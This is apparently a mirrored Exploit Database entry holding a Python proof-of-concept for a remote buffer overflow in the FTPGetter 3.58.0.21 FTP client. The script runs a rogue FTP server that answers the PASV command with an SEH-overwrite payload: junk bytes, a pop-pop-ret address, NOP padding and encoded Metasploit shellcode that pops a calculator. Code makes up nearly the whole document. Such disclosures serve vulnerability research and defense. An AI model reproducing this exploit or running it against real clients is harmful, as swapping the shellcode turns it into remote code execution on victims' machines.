FTPGetter 3.58.0.21 – ‘PASV’ Remote Buffer Overflow

• Exploit Database
• 119 阅读

• 作者： modpr0be
  日期： 2011-02-03
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16101/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141

  #!/usr/bin/python   # Exploit Title: FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit # Date: 02/03/2011 # Author: modpr0be # Software Link: http://www.ftpgetter.com/ftpgetter_setup.exe # Vulnerable version: <= 3.58.0.21 # Tested on: Windows XP SP3 (VMware Player 3.1.3 build-324285) # CVE : N/A   # ====================================================================== #___ _ _______ __ # ____/ (_)___ _(_) /_____ _/ / ________/ /_(_)___/ /_______ _ #/ __/ / __ <code>/ / __/ __ </code>/ / / _ \/ ___/ __ \/ / __/ __ \/ __ `/ # / /_/ / / /_/ / / /_/ /_/ / / /__/ /__/ / / / / /_/ / / / / /_/ / # \__,_/_/\__, /_/\__/\__,_/_/\___/\___/_/ /_/_/\__,_/_/ /_/\__,_/ #/____/http://www.digital-echidna.org # ====================================================================== # # Greetz: # say hello to all digital-echidna org crew: # otoy, cipherstring, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix # special thx: # otoy, cipherstring, cyb3r.anbu, oebaj. # help for documentation: # offsec, exploit-db, corelan-team, 5M7X, loneferret. #   #### Software description: # Save time on FTP/SFTP updates! Plan your uploads and automate the workflow. # Schedule and automate file transfers with a centralized console. Let your # computer move or synchronize information securely between home and office # automatically according to the schedule! # #### Exploit information: # There was an error when sending a response to the PASV command. # Fortunately, these errors lead to buffer overflows. # This exploit is unstable. It should only be used as a POC. # I tried several times on various systems, # the buffer sometimes changed. # ### Some Conditions: # This POC is using "the most selling feature" Automated FTP Request. # So this POC, I use Auto Download with / as the Source Files. # Scheduler Settings also set to Repetitive. # Make sure to run the program first before this POC. # #### Other information: # It&apos;s a part of "Death of an FTP Client" :) # For more information, loot at here: # http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ # ##   from socket import * import struct import time   total = 1000 junk1 = "\x41" * 485 nseh = "\xeb\x06\x90\x90" seh = struct.pack(&apos;<L&apos;, 0x1001A149) # ppr from ssleay32.dll nops = "\x90" * 8   # msfpayload windows/exec CMD=calc R | msfencode -t c # [*] x86/shikata_ga_nai succeeded with size 223 (iteration=1) # BadChars \x00\xff\x0d\x5c\x2f\x0a   shellcode = ( "\xdb\xd1\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x32\xb8\xca\xea\xc0" "\x1f\x31\x42\x17\x83\xc2\x04\x03\x88\xf9\x22\xea\xf0\x16\x2b" "\x15\x08\xe7\x4c\x9f\xed\xd6\x5e\xfb\x66\x4a\x6f\x8f\x2a\x67" "\x04\xdd\xde\xfc\x68\xca\xd1\xb5\xc7\x2c\xdc\x46\xe6\xf0\xb2" "\x85\x68\x8d\xc8\xd9\x4a\xac\x03\x2c\x8a\xe9\x79\xdf\xde\xa2" "\xf6\x72\xcf\xc7\x4a\x4f\xee\x07\xc1\xef\x88\x22\x15\x9b\x22" "\x2c\x45\x34\x38\x66\x7d\x3e\x66\x57\x7c\x93\x74\xab\x37\x98" "\x4f\x5f\xc6\x48\x9e\xa0\xf9\xb4\x4d\x9f\x36\x39\x8f\xe7\xf0" "\xa2\xfa\x13\x03\x5e\xfd\xe7\x7e\x84\x88\xf5\xd8\x4f\x2a\xde" "\xd9\x9c\xad\x95\xd5\x69\xb9\xf2\xf9\x6c\x6e\x89\x05\xe4\x91" "\x5e\x8c\xbe\xb5\x7a\xd5\x65\xd7\xdb\xb3\xc8\xe8\x3c\x1b\xb4" "\x4c\x36\x89\xa1\xf7\x15\xc7\x34\x75\x20\xae\x37\x85\x2b\x80" "\x5f\xb4\xa0\x4f\x27\x49\x63\x34\xd7\x03\x2e\x1c\x70\xca\xba" "\x1d\x1d\xed\x10\x61\x18\x6e\x91\x19\xdf\x6e\xd0\x1c\x9b\x28" "\x08\x6c\xb4\xdc\x2e\xc3\xb5\xf4\x4c\x82\x25\x94\x92")   junk2 = "\x90" * (total - len(junk1+nseh+seh+nops+shellcode)) payload = junk1+nseh+seh+nops+shellcode+junk2   host = "0.0.0.0" port = 21   s = socket(AF_INET, SOCK_STREAM) s.bind((host, port)) s.listen(1)   print "\n[+] FTPGetter v3.58.0.21 Buffer Overflow POC" print "[+] by modpr0be[at]digital-echidna[dot]org." print "=============================================" print "[+] Evil FTP Server Started." print "[+] Listening on %d ..." % port   cl, addr = s.accept() print "[+] Connection accepted from %s" % addr[0] print "[+] Whatever for username and password."   def hajar(): welcome = "220 Welcome to EvilFTP Server\r\n" cl.send(welcome) cl.recv(1024) cl.send("331 User name okay, need password\r\n") # received USER cl.recv(1024) cl.send("230-Password accepted\r\n") # received PASS cl.send("230 User logged in.\r\n") cl.recv(1024) cl.send("215 UNIX Type: L8\r\n") # received from SYST cl.recv(1024) cl.send("200 Type set to I\r\n") # received from TYPE I cl.recv(1024) cl.send("200 OK\r\n") # received from REST 0 cl.recv(1024) cl.send("200 Command not Understood\r\n") # received from OPTS UTF8 OFF cl.recv(1024) cl.send("257 \"/\" is current directory\r\n") # received from PWD cl.recv(1024) cl.send("250 CWD Command successful.\r\n") cl.recv(1024) cl.send("257 \"/\" is current directory\r\n") # received from PWD cl.recv(1024) cl.send("200 Type set to I\r\n") # received from TYPE I cl.recv(1024) print "[+] Begin sending evil passive mode.." cl.send("227 Entering Passive Mode ("+payload+",1,1,1,1,1)\r\n") # this is the junk from passive mode cl.recv(1024) cl.close()   hajar() time.sleep(3) print "[+] Skadush! Calculator will pop out..\r\n"   s.close()